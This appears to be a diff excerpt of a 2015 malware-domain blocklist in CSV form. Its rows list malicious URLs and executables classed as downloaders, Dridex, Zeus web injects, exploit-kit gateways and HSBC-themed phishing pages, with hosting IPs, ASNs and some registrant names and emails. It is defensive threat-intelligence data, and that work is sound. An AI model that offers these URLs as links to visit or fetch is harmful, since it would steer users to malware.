+"2015/01/08_08:12","-","37.221.162.57/pod2/sdfbfhj.exe","lh20471.voxility.net.","Trojan.Downloader","-","39743","0","RO", +"2015/01/08_08:12","-","5.254.98.54/pod2/sdhfjkl.exe","lh20471.voxility.net.","Trojan.Downloader","-","39743","0","RO", +"2015/01/08_08:12","-","93.77.231.193/pod2/sdhfjkl.exe","dynamic.te.volia.net.","Trojan.Injector.HNNP","-","25229","0","UA", +"2015/01/08_08:12","-","93.79.189.119/pod1/gavr001.exe","-","Trojan.Downloader","-","25229","0","UA", +"2015/01/13_12:55","fgtkmcby02.eu:9633/file/help.php?state=36","185.16.40.228","-","exploit kit","NOT DISCLOSED! / admin@tldregistrarsolutions.com","199456","0","GB", +"2015/01/13_14:47","rubiks.ca/js/jquery-1.14.94.js","50.87.18.127","50-87-18-127.unifiedlayer.com.","Compromised site, leads to exploit","-","46606","0","US", +"2015/01/13_14:47","mysmallcock.com/taxadmin/get_doc.html","64.6.105.241","64-6-105-241.phatservers.com.","Compromised site, leads to exploit","Moniker Privacy Services / 06576f6b70bd921b7c9ae9bd086f71a0fdf8d2789d91134f4625be3faabfbeda@mysmallcock.com.whoisproxy.org","30266","0","US", +"2015/01/13_14:47","monarchslo.com/taxadmin/get_doc.html","69.163.242.27","apache2-dap.mafdet.dreamhost.com.","Compromised site, leads to exploit","Registrar Abuse Contact domain-abuse@dreamhost.com","26347","0","US", +"2015/01/13_14:47","leagleconsulting.com/taxadmin/get_doc.html","209.235.144.9","hostedc31.carrierzone.com.","Compromised site, leads to exploit","Registrar Abuse Contact abuse@web.com","30447","0","US", +"2015/01/13_14:47","myshopmarketim.com/taxadmin/get_doc.html","94.73.148.140","94-73-148-140.cizgi.net.tr.","Compromised site, leads to exploit","Registrar Abuse Contact abuse@nicproxy.com","34619","0","TR", +"2015/01/13_14:47","mindstormstudio.ro/taxadmin/get_doc.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site, leads to exploit","-","24940","0","DE", +"2015/01/13_14:47","semiyun.com/taxadmin/get_doc.html","95.173.170.227","227rfszma.guzel.net.tr.","Compromised site, leads to exploit","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","51559","0","TR", +"2015/01/13_14:47","maxisoft.co.uk/taxadmin/get_doc.html","192.185.111.220","ns539.websitewelcome.com.","Compromised site, leads to exploit","Zircon Ventures Ltd / -","20013","0","US", +"2015/01/13_14:47","sdg-translations.com/taxadmin/get_doc.html","209.235.144.9","hostedc31.carrierzone.com.","Compromised site, leads to exploit","PERFECT PRIVACY, LLC / 4enhel794kj7aa42oj5jn1s0co@domaindiscreet.com","30447","0","US", +"2015/01/13_14:47","omrdatacapture.com/taxadmin/get_doc.html","213.171.218.18","server213-171-218-18.livedns.org.uk.","Compromised site, leads to exploit","Registrar Abuse Contact abuse@lcn.com","8560","0","GB", +"2015/01/13_14:47","lydwood.co.uk/taxadmin/get_doc.html","209.235.144.9","hostedc31.carrierzone.com.","Compromised site, leads to exploit","LYDWOOD (GLOS) LTD / -","30447","0","US", +"2015/01/14_20:48","d4.cumshots.ws:25707/history/t/movies.php?timeline=21","46.254.18.236","hosted-by.ihc.ru.","exploit kit","Registrar Abuse Contact abuse@godaddy.com","42244","0","RU", +"2015/02/17_01:15","ad-beast.com/ads.js","5.61.39.14","-","Browlock, Malvertising","Registrar Abuse Contact tld-abuse@nic.ru","16265","0","GB", +"2015/02/17_01:15","njtgsd.attackthethrone.com/public-justice/64XPKZldWDM_/R4efelSvf_/I1OdCoSKw2r1epqivQsiUvi9Pb1pHroRToqggbsG5oYAuB_/fSiunpQPK/_/lE3aXgQ~~/MTQ2N2I5OThlNWVjOWFmMWQ2OTE0ZjBh/governing-institution.mhtml","94.242.203.247","ip-static-94-242-203-247.server.lu.","Browlock.Malvertising","-","5577","0","LU", +"2015/02/25_07:37","static.retirementcommunitiesfyi.com/k?tstmp=34723984","50.87.151.146","50-87-151-146.unifiedlayer.com.","Gateway for Sweet Orange EK","-","46606","0","US", +"2015/02/28_14:36","www.vipcpms.com/watch?key=e722a8eea048590dd97760d8b657327b&scrWidth=1680&scrHeight=1050&tz=0","209.200.44.228","trgdbtest.webair.com.","Malvertising, Android.FakeAV","Registrar Abuse Contact abuse@enom.com","27257","0","US", +"2015/02/28_14:36","app.pho8.com/click.php?c=246&key=l8s861364oq1y6w08t9kjkq1&pl_id=1286","198.58.103.202","li553-202.members.linode.com.","Malvertising, Android.FakeAV","-","36351","0","US", +"2015/02/28_14:36","app.pho8.com/lp/sd/en/lp4/index.php?c=300&l=524&subid=21841780391","198.58.103.202","li553-202.members.linode.com.","Malvertising, Android.FakeAV","-","36351","0","US", +"2015/02/28_14:36","app.pho8.com/lp/sd/en/lp4/files/bootstrap.css","198.58.103.202","li553-202.members.linode.com.","Malvertising, Android.FakeAV","-","36351","0","US", +"2015/02/28_14:36","app.pho8.com/lp/sd/en/lp4/files/bootstrap-responsive.css","198.58.103.202","li553-202.members.linode.com.","Malvertising, Android.FakeAV","-","36351","0","US", +"2015/02/28_14:36","app.pho8.com/go.php?c=255&l=387&subid=21843049645","198.58.103.202","li553-202.members.linode.com.","Malvertising, Android.FakeAV","-","36351","0","US", +"2015/02/28_14:36","app.pho8.com/jump/?jl=66968484","198.58.103.202","li553-202.members.linode.com.","Malvertising, Android.FakeAV","-","36351","0","US", +"2015/02/28_14:36","app.pho8.com/go.php?c=246&l=509&subid=21388413584?","198.58.103.202","li553-202.members.linode.com.","Malvertising, Fake.Cleaner","-","36351","0","US", +"2015/02/28_14:36","www.officialrdr.com/b012dd3a-0871-4fc2-a5d8-8f6e6e30c334","54.236.134.245","ec2-54-236-134-245.compute-1.amazonaws.com.","Malvertising, Android.FakeAV","Registrar Abuse Contact abuse@enom.com","14618","0","US", +"2015/02/28_14:36","www.scanmyphones.com/fatalvirus/mx/101/index.php?countryname=United%20Kingdom&brand=&model=&isp=PlusNet%20Technologies%20Ltd&voluumdata=vid..00000008-5d87-4a50-8000-000000000000__vpid..15af7000-bf52-11e4-8afe-28ca782357aa__caid..b012dd3a-0871-4fc2-a5d8-8f6e6e30c334__lid..281f1d6a-3f5c-4aef-b00d-8178c6d9f00f__rt..D__oid1..14fdf5b9-f153-4ad7-9aec-c61b2432d31e","54.209.159.227","ec2-54-209-159-227.compute-1.amazonaws.com.","Malvertising, Android.FakeAV","Registrar Abuse Contact abuse@enom.com","14618","0","US", +"2015/02/28_14:36","mobile.bitterstrawberry.org/?id=1319","85.17.137.41","-","Malvertising, Android.FakeAV","Bitter Strawberry / kd@bitterstrawberry.com","60781","0","NL", +"2015/03/07_07:57","dimarsbg.com/images/portfolio/vtutmcireturxeitritxirete/rcturtncuyretycrutycreu.exe","95.141.37.183","cphost04.qhoster.net.","Trojan.Backdoor","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49367","0","IT", +"2015/03/07_07:57","dimarsbg.com/images/prettyPhoto/light_rounded/jicmtritucirutmucr.exe","95.141.37.183","cphost04.qhoster.net.","Trojan.Backdoor","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49367","0","IT", +"2015/03/07_07:57","dimarsbg.com/images/social_media/vuiutcimrieiurxiexerexrexrerex/vrituiruixtuieruxtireuit.exe","95.141.37.183","cphost04.qhoster.net.","Trojan.Backdoor","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49367","0","IT", +"2015/03/09_13:46","-","64.37.52.84/~ibnking1/latino/","smart.host-care.com.","trojans","-","33182","0","US", +"2015/03/11_12:26","hujii.qplanner.cf:8181/2006/movies/html/christmas.php?online=160755&paper=124&what=109448&promos=206723&exchange=309188&edit=135400&common=216956","46.254.17.30","hosted-by.ihc.ru.","exploit kit","E-mail: abuse: abuse@freenom.com, copyright infringement: copyright@freenom.com","42244","0","RU", +"2015/03/20_11:35","b.nevadaprivateoffice.com:8085/phpmyadm/modelsearch/help/after.php?before=3","46.254.17.233","hosted-by.ihc.ru.","Sweet Orange exploit kit","-","42244","0","RU", +"2015/03/28_05:29","-","46.160.125.167/p2603us21.pdf","46.160.125.167.format-tv.net.","Trojan.Upatre","-","6712","0","UA", +"2015/03/28_05:29","-","46.160.125.167/2603uk11.pdf","46.160.125.167.format-tv.net.","Trojan.Upatre","-","6712","0","UA", +"2015/03/28_05:29","-","46.160.125.167/2603uk12.pdf","46.160.125.167.format-tv.net.","Trojan.Upatre","-","6712","0","UA", +"2015/03/28_05:29","-","46.160.125.167/p2603us11.pdf","46.160.125.167.format-tv.net.","Trojan.Upatre","-","6712","0","UA", +"2015/03/28_05:29","-","46.160.125.167/p2603us12.pdf","46.160.125.167.format-tv.net.","Trojan.Upatre","-","6712","0","UA", +"2015/03/28_05:29","-","46.249.3.66/winbox/winbox.exe","-","Trojan.Upatre","-","34456","0","RU", +"2015/04/11_14:34","theweatherspace.com","185.53.177.20","-","Malvertising","Registrar Abuse Contact abuse@web.com","61969","0","DE", +"2015/04/11_14:50","securitywebservices.com/aEubV1l8Cu.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/11_14:50","securitywebservices.com/an4XpPvL6p.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/11_14:50","securitywebservices.com/bQR3XpCbGj.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/11_14:50","securitywebservices.com/hD08940x9A.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/11_14:50","securitywebservices.com/HNXZAxrMNC.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/11_14:50","securitywebservices.com/JPPj4HhWXH.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/11_14:50","securitywebservices.com/nuLwjhUDt4.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/11_14:50","securitywebservices.com/pbMes3AKl2.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/11_14:50","securitywebservices.com/s4haYynZvs.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/11_14:50","securitywebservices.com/WQLzrpnA7D.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/11_14:50","securitywebservices.com/WrQBcRn4E3.js","217.23.5.57","-","P2PZeus.WebInject","-","49981","0","NL", +"2015/04/20_23:15","thewinesteward.com/css/Document1704.exe","192.254.249.180","-","Trojan.Dyre","Registrar Abuse Contact abuse@web.com","46606","0","US", +"2015/04/21_10:28","eternitymobiles.com/25/144.exe","203.170.86.89","server-2h-r34.ipv4.au.syrahost.com.","Trojan.Dridex","Registrar Abuse Contact domains@crazydomains.com","38719","0","AU", +"2015/04/21_10:28","e-matelco.com/25/144.exe","200.58.114.51","libia.dattaweb.com.","Trojan.Dridex","-","27823","0","AR", +"2015/04/21_10:28","TRIANGLESERVICESLTD.COM/25/144.exe","113.21.229.2","-","Trojan.Dridex","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","45766","0","BD", +"2015/04/21_10:28","hobby-hangar.net/25/144.exe","94.76.212.176","swindon.eukhost.com.","Trojan.Dridex","Registrar Abuse Contact abuse@enom.com","29550","0","GB", +"2015/04/21_10:28","creditbootcamp.com/25/144.exe","192.185.48.205","-","Trojan.Dridex","-","20013","0","US", +"2015/04/21_10:28","hana-naveh.com/25/144.exe","194.213.4.7","pleski.hostandfound.com.","Trojan.Dridex","-","5486","0","IL", +"2015/04/22_15:17","gurde.tourstogo.us/leefoohopt/ezussoadyz/utufegheer/files/GO49776M.vbs","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","-","185.91.175.183/sas/evzxce.exe","-","Trojan.Backdoor","-","42632","0","RU", +"2015/04/22_15:17","web-sensations.com/js/jquery-1.40.15.js","192.186.238.40","ip-192-186-238-40.ip.secureserver.net.","JS.Exploit","-","26496","0","US", +"2015/04/22_15:17","jstaikos.com/51i70l/chbpy.html","192.186.209.131","ip-192-186-209-131.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","agsteier.com/HSBC_BANK_STORAGE-DATA/new-payment.html","173.254.28.44","just44.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","broadtech.co/HSBC_BANK-STORAGE_DATA/new-payment.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","bilbaopisos.es/HSBC_BANK.STORAGE-DATA/secure.html","216.119.143.194","ssr1.supercp.com.","Script.Exploit","-","55293","0","US", +"2015/04/22_15:17","ajewishgift.com/HSBC_BANK_STORAGE_DATA/payment_document.html","192.186.223.196","ip-192-186-223-196.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","2amsports.com/HSBC-BANK_STORAGE_DATA/new-payment-document.html","69.89.21.71","box71.bluehost.com.","Script.Exploit","-","46606","0","US", +"2015/04/22_15:17","sweettalk.co/HSBC.BANK.STORAGE_DATA/new_document.html","192.186.240.69","ip-192-186-240-69.ip.secureserver.net.","Script.Exploit","Adam Farrar / support@hostgator.com","26496","0","US", +"2015/04/22_15:17","bilbaopisos.es/BANK.STORAGE-DATA/secure_payment_document.html","216.119.143.194","ssr1.supercp.com.","Script.Exploit","-","55293","0","US", +"2015/04/22_15:17","agsteier.com/HSBC.BANK-STORAGE.DATA/new_secure-document.html","173.254.28.44","just44.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","hinsib.com/HSBC_BANK.STORAGE.DATA/secure_payment.document.html","198.38.82.23","mocha6001.mochahost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","23352","0","US", +"2015/04/22_15:17","impressoras-cartoes.com.pt/HSBC.STORAGE.DATA/new.payment.html","109.71.43.41","idonic.com.","Script.Exploit","Idonicsys - Sistemas de Informação, Lda. / fccn@ptisp.pt;idonicsys@idonic.com","24768","0","PT", +"2015/04/22_15:17","cacl.fr/HSBC-BANK_STORAGE_DATA/secure.payment.html","174.127.110.239","slan-550-81.anhosting.com.","Script.Exploit","boonen_thanh@hotmail.com","29854","0","US", +"2015/04/22_15:17","wv-law.com/HSBC-BANK-DATA/secure_payment.html","160.153.48.70","ip-160-153-48-70.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","aminev.com/HSBC.BANK-STORAGE-DATA/new.payment_document.html","69.89.22.122","box122.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2015/04/22_15:17","hydraulicpowerpack.com/HSBC-BANK.STORAGE_DATA/new_secure.html","119.18.61.133","-","Script.Exploit","Registrar Abuse Contact abuse@fabulous.com","33480","0","IN", +"2015/04/22_15:17","hydraulicpowerpack.com/BANK-STORAGE-DATA/new-document.html","119.18.61.133","-","Script.Exploit","Registrar Abuse Contact abuse@fabulous.com","33480","0","IN", +"2015/04/22_15:17","sweettalk.co/HSBC.BANK-STORAGE_DATA/payment.html","192.186.240.69","ip-192-186-240-69.ip.secureserver.net.","Script.Exploit","Adam Farrar / support@hostgator.com","26496","0","US", +"2015/04/22_15:17","aminev.com/HSBC.BANK.DATA/new-secure.html","69.89.22.122","box122.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2015/04/22_15:17","aminev.com/HSBC.STORAGE-DATA/new.payment-document.html","69.89.22.122","box122.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2015/04/22_15:17","agsteier.com/HSBC_BANK.STORAGE-DATA/new.html","173.254.28.44","just44.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","broadtech.co/HSBC_BANK_STORAGE/payment-document.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","hydraulicpowerpack.com/HSBC.BANK_STORAGE.DATA/new_payment.document.html","119.18.61.133","-","Script.Exploit","Registrar Abuse Contact abuse@fabulous.com","33480","0","IN", +"2015/04/22_15:17","teprom.it/HSBC.BANK.STORAGE/document.html","213.205.38.23","client-sh-3.hosting.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2015/04/22_15:17","broadtech.co/HSBC-BANK.STORAGE_DATA/new_secure.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","hydraulicpowerpack.com/HSBC.BANK_STORAGE/payment-document.html","119.18.61.133","-","Script.Exploit","Registrar Abuse Contact abuse@fabulous.com","33480","0","IN", +"2015/04/22_15:17","bilbaopisos.es/HSBC_BANK_STORAGE_DATA/secure.payment_document.html","216.119.143.194","ssr1.supercp.com.","Script.Exploit","-","55293","0","US", +"2015/04/22_15:17","broadtech.co/HSBC.BANK.STORAGE.DATA/payment.document.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","sweettalk.co/HSBC.BANK.STORAGE/payment.document.html","192.186.240.69","ip-192-186-240-69.ip.secureserver.net.","Script.Exploit","Adam Farrar / support@hostgator.com","26496","0","US", +"2015/04/22_15:17","wv-law.com/HSBC_BANK_STORAGE/new-payment.document.html","160.153.48.70","ip-160-153-48-70.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","teprom.it/BANK.STORAGE-DATA/secure_document.html","213.205.38.23","client-sh-3.hosting.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2015/04/22_15:17","hydraulicpowerpack.com/HSBC.BANK.STORAGE/secure_payment.document.html","119.18.61.133","-","Script.Exploit","Registrar Abuse Contact abuse@fabulous.com","33480","0","IN", +"2015/04/22_15:17","bilbaopisos.es/HSBC_BANK-STORAGE.DATA/new_payment.html","216.119.143.194","ssr1.supercp.com.","Script.Exploit","-","55293","0","US", +"2015/04/22_15:17","bilbaopisos.es/HSBC.BANK_STORAGE/secure.payment_document.html","216.119.143.194","ssr1.supercp.com.","Script.Exploit","-","55293","0","US", +"2015/04/22_15:17","abcdespanol.com/HSBC.BANK_STORAGE/secure.document.html","173.254.28.143","just143.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","ajewishgift.com/HSBC_BANK_DATA/payment-document.html","192.186.223.196","ip-192-186-223-196.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","ajewishgift.com/HSBC_BANK-STORAGE_DATA/new_secure-document.html","192.186.223.196","ip-192-186-223-196.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","hydraulicpowerpack.com/HSBC_BANK_DATA/payment_document.html","119.18.61.133","-","Script.Exploit","Registrar Abuse Contact abuse@fabulous.com","33480","0","IN", +"2015/04/22_15:17","undefined.it/HSBC-BANK_DATA/secure.payment.document.html","174.127.110.143","slan-550-59.anhosting.com.","Script.Exploit","-","29854","0","US", +"2015/04/22_15:17","2amsports.com/BANK-STORAGE_DATA/secure.html","69.89.21.71","box71.bluehost.com.","Script.Exploit","-","46606","0","US", +"2015/04/22_15:17","teprom.it/HSBC-BANK_STORAGE-DATA/new_secure_payment.html","213.205.38.23","client-sh-3.hosting.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2015/04/22_15:17","hydraulicpowerpack.com/BANK.STORAGE.DATA/payment-document.html","119.18.61.133","-","Script.Exploit","Registrar Abuse Contact abuse@fabulous.com","33480","0","IN", +"2015/04/22_15:17","abcdespanol.com/HSBC-STORAGE-DATA/payment.document.html","173.254.28.143","just143.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","ajewishgift.com/HSBC_STORAGE.DATA/secure_payment.html","192.186.223.196","ip-192-186-223-196.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","2amsports.com/HSBC.STORAGE-DATA/secure.payment.html","69.89.21.71","box71.bluehost.com.","Script.Exploit","-","46606","0","US", +"2015/04/22_15:17","broadtech.co/BANK-STORAGE.DATA/new_payment.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","999fitness.com/HSBC.BANK_STORAGE.DATA/new.html","69.89.31.242","box442.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2015/04/22_15:17","agsteier.com/HSBC-STORAGE-DATA/payment.document.html","173.254.28.44","just44.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","2amsports.com/HSBC-BANK_STORAGE.DATA/secure-payment-document.html","69.89.21.71","box71.bluehost.com.","Script.Exploit","-","46606","0","US", +"2015/04/22_15:17","sweettalk.co/HSBC-BANK_STORAGE/new.secure.html","192.186.240.69","ip-192-186-240-69.ip.secureserver.net.","Script.Exploit","Adam Farrar / support@hostgator.com","26496","0","US", +"2015/04/22_15:17","abcdespanol.com/BANK_STORAGE.DATA/new.payment.html","173.254.28.143","just143.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","aminev.com/HSBC.BANK_STORAGE-DATA/secure_document.html","69.89.22.122","box122.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2015/04/22_15:17","broadtech.co/HSBC-STORAGE_DATA/payment.document.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","cacl.fr/HSBC.BANK_STORAGE_DATA/document.html","174.127.110.239","slan-550-81.anhosting.com.","Script.Exploit","boonen_thanh@hotmail.com","29854","0","US", +"2015/04/22_15:17","999fitness.com/HSBC_BANK-STORAGE-DATA/new_payment.html","69.89.31.242","box442.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2015/04/22_15:17","cacl.fr/HSBC-STORAGE_DATA/new.secure.html","174.127.110.239","slan-550-81.anhosting.com.","Script.Exploit","boonen_thanh@hotmail.com","29854","0","US", +"2015/04/22_15:17","wv-law.com/HSBC.BANK_STORAGE.DATA/secure_payment.html","160.153.48.70","ip-160-153-48-70.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","cacl.fr/HSBC.BANK_STORAGE-DATA/payment.html","174.127.110.239","slan-550-81.anhosting.com.","Script.Exploit","boonen_thanh@hotmail.com","29854","0","US", +"2015/04/22_15:17","hinsib.com/HSBC.BANK_DATA/new-payment.document.html","198.38.82.23","mocha6001.mochahost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","23352","0","US", +"2015/04/22_15:17","abcdespanol.com/BANK_STORAGE_DATA/new.secure-document.html","173.254.28.143","just143.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","impressoras-cartoes.com.pt/BANK_STORAGE-DATA/new.payment.html","109.71.43.41","idonic.com.","Script.Exploit","Idonicsys - Sistemas de Informação, Lda. / fccn@ptisp.pt;idonicsys@idonic.com","24768","0","PT", +"2015/04/22_15:17","broadtech.co/BANK_STORAGE.DATA/secure_payment_document.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","bilbaopisos.es/BANK-STORAGE.DATA/secure_payment-document.html","216.119.143.194","ssr1.supercp.com.","Script.Exploit","-","55293","0","US", +"2015/04/22_15:17","teprom.it/HSBC_BANK_STORAGE_DATA/secure-document.html","213.205.38.23","client-sh-3.hosting.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2015/04/22_15:17","2amsports.com/HSBC_BANK-STORAGE_DATA/secure.html","69.89.21.71","box71.bluehost.com.","Script.Exploit","-","46606","0","US", +"2015/04/22_15:17","impressoras-cartoes.com.pt/HSBC.BANK.STORAGE/payment.html","109.71.43.41","idonic.com.","Script.Exploit","Idonicsys - Sistemas de Informação, Lda. / fccn@ptisp.pt;idonicsys@idonic.com","24768","0","PT", +"2015/04/22_15:17","aminev.com/HSBC_BANK-STORAGE.DATA/new_payment-document.html","69.89.22.122","box122.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2015/04/22_15:17","2amsports.com/HSBC-BANK.DATA/new_payment.html","69.89.21.71","box71.bluehost.com.","Script.Exploit","-","46606","0","US", +"2015/04/22_15:17","wv-law.com/HSBC_STORAGE-DATA/new-secure.payment.html","160.153.48.70","ip-160-153-48-70.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","undefined.it/BANK-STORAGE-DATA/new-payment.document.html","174.127.110.143","slan-550-59.anhosting.com.","Script.Exploit","-","29854","0","US", +"2015/04/22_15:17","abcdespanol.com/HSBC_BANK-STORAGE-DATA/secure-payment.document.html","173.254.28.143","just143.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","abcdespanol.com/HSBC-BANK_STORAGE.DATA/new.payment.html","173.254.28.143","just143.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","cacl.fr/HSBC_BANK-STORAGE-DATA/secure_payment_document.html","174.127.110.239","slan-550-81.anhosting.com.","Script.Exploit","boonen_thanh@hotmail.com","29854","0","US", +"2015/04/22_15:17","hinsib.com/BANK-STORAGE.DATA/secure.document.html","198.38.82.23","mocha6001.mochahost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","23352","0","US", +"2015/04/22_15:17","abcdespanol.com/HSBC.STORAGE_DATA/new_payment_document.html","173.254.28.143","just143.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","broadtech.co/HSBC_BANK.STORAGE-DATA/secure.document.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","ajewishgift.com/HSBC.BANK.STORAGE_DATA/new_secure.payment.html","192.186.223.196","ip-192-186-223-196.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","sweettalk.co/HSBC.BANK_STORAGE-DATA/payment.html","192.186.240.69","ip-192-186-240-69.ip.secureserver.net.","Script.Exploit","Adam Farrar / support@hostgator.com","26496","0","US", +"2015/04/22_15:17","wv-law.com/HSBC-BANK-STORAGE.DATA/payment_document.html","160.153.48.70","ip-160-153-48-70.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","undefined.it/HSBC_BANK.STORAGE.DATA/new-secure.document.html","174.127.110.143","slan-550-59.anhosting.com.","Script.Exploit","-","29854","0","US", +"2015/04/22_15:17","ajewishgift.com/HSBC-BANK-STORAGE-DATA/secure.html","192.186.223.196","ip-192-186-223-196.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","2amsports.com/HSBC.BANK_STORAGE-DATA/new_secure.document.html","69.89.21.71","box71.bluehost.com.","Script.Exploit","-","46606","0","US", +"2015/04/22_15:17","broadtech.co/HSBC.BANK_STORAGE_DATA/secure-document.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","mtldesigns.ca/HSBC-BANK-DATA/new-secure-document.html","23.229.153.132","ip-23-229-153-132.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","ajewishgift.com/HSBC_BANK-STORAGE-DATA/secure.html","192.186.223.196","ip-192-186-223-196.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","impressoras-cartoes.com.pt/HSBC_BANK-STORAGE/new_document.html","109.71.43.41","idonic.com.","Script.Exploit","Idonicsys - Sistemas de Informação, Lda. / fccn@ptisp.pt;idonicsys@idonic.com","24768","0","PT", +"2015/04/22_15:17","mtldesigns.ca/HSBC-BANK.STORAGE/new_secure.document.html","23.229.153.132","ip-23-229-153-132.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","bilbaopisos.es/HSBC_BANK.STORAGE_DATA/secure.payment.html","216.119.143.194","ssr1.supercp.com.","Script.Exploit","-","55293","0","US", +"2015/04/22_15:17","sweettalk.co/HSBC_BANK-STORAGE-DATA/secure.html","192.186.240.69","ip-192-186-240-69.ip.secureserver.net.","Script.Exploit","Adam Farrar / support@hostgator.com","26496","0","US", +"2015/04/22_15:17","sweettalk.co/HSBC_BANK.STORAGE_DATA/payment.html","192.186.240.69","ip-192-186-240-69.ip.secureserver.net.","Script.Exploit","Adam Farrar / support@hostgator.com","26496","0","US", +"2015/04/22_15:17","wv-law.com/HSBC_BANK_DATA/secure_payment.html","160.153.48.70","ip-160-153-48-70.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","cacl.fr/HSBC-BANK_DATA/secure.html","174.127.110.239","slan-550-81.anhosting.com.","Script.Exploit","boonen_thanh@hotmail.com","29854","0","US", +"2015/04/22_15:17","wv-law.com/HSBC.BANK_STORAGE_DATA/new_payment_document.html","160.153.48.70","ip-160-153-48-70.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","hydraulicpowerpack.com/HSBC.BANK_DATA/payment-document.html","119.18.61.133","-","Script.Exploit","Registrar Abuse Contact 